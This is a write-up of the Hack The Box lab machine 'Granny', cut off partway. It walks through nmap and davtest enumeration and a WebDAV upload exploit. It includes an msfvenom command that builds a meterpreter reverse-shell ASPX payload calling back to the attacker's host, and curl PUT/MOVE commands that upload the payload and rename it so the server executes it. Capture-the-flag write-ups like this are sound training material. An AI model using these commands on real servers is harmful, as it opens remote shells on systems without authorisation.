Granny — Hack The Box [Write-up]

5 min readJan 29, 2021

Introduction:

Granny, while similar to Grandpa, can be exploited using several different methods. The intended method of solving this machine is the widely-known Webdav upload vulnerability.

I learned a lot from this machine because it was the first time working on WebDav and also i hadn’t face any machine that is exploited by uploading files through requests, it really added a lot to me :D

Skills Required:

Basic knowledge of Windows
Enumerating ports and services
Basic knowledge of Metasploit usage

Skills Learned:

Identifying known vulnerabilities
Basic HTTP request knowledge
Basic Windows privilege escalation techniques

Used Tools:

Nmap
Davtset
Curl
Msfvenom
Metasploit

1. SCANNING & ENUMERATION

I will start with nmap and the -A parameter to enable OS detection, version detection, script scanning, and traceroute and append the output to tee command which save the in a file named “nmap” and also show the output on the screen.

Nmap is done with only port 80 open, I also noticed in the scan that there is some request methods are applicable, besides that webdav-scan is particularly interesting…

After checking the website i found nothing, it is still under development… So let’s enumerate the directories:

I tried to navigate through them but i hit a block wall so i had to think of other way…

By checking the response of the server

The X-Powered-By: ASP.NET tells me that aspx files may execute if I can get them onto target.

WebDav:

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP that allows clients to perform remote Web content authoring operations.

As noticed in the nmap, webdav scan showed methods such as PUT and MOVE. I might be able to upload files this way.

I will use tool called davtest which is pre-installed in kali, it scan the website for us and show weather we can create directory, upload/execute files and the headers for that…

davtest -url http://10.10.10.15

The davtest scan shows that we can upload alot of file types but not aspx which we want for the execution process…

Let’s try the upload process using curl but before uploading them you must check these parameters(-X , -d , -H) if you aren’t familiar with curl I will leave the screenshots of their description in the end of the write-up, Let’s continue…

-X PUT → to use PUT method

-d @test.txt → to upload the test.txt from our machine

It is successfully uploaded.

2. EXPLOITATION

The idea here is that we saw from the output of davtest that we can upload a txt file but not an aspx, So what about uploading the aspx file as txt and after successfully uploading it change it from .txt → .aspx , Let’s try it…

First we will generate a meterpreter reverse payload by msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.130 LPORT=1234 -f aspx > exploit.aspx

Then upload it to the site using curl…

curl -X PUT http://10.10.10.15/exploit.txt -d @exploit.aspx

Now we successfully uploaded the payload, Let’s change it from txt to aspx

curl -X MOVE -H ‘Destination: http://10.10.10.15/exploit.aspx’ http://10.10.10.15/exploit.txt

Start Metasploit’s Handler:

Execute the payload by accessing the http://10.10.10.15/exploit.aspx

It FAILS…

Why !!? if we see the exploit.txt we will see that the whitespaces is all jacked up…

I’ll upload again, this time using — data-binary to preserve endlines and other control characters:

curl -X PUT http://10.10.10.15/exploit.txt — data-binary @exploit.aspx
curl -X MOVE -H ‘Destination: http://10.10.10.15/exploit.aspx’ http://10.10.10.15/exploit.txt

Then execute it and check the handler…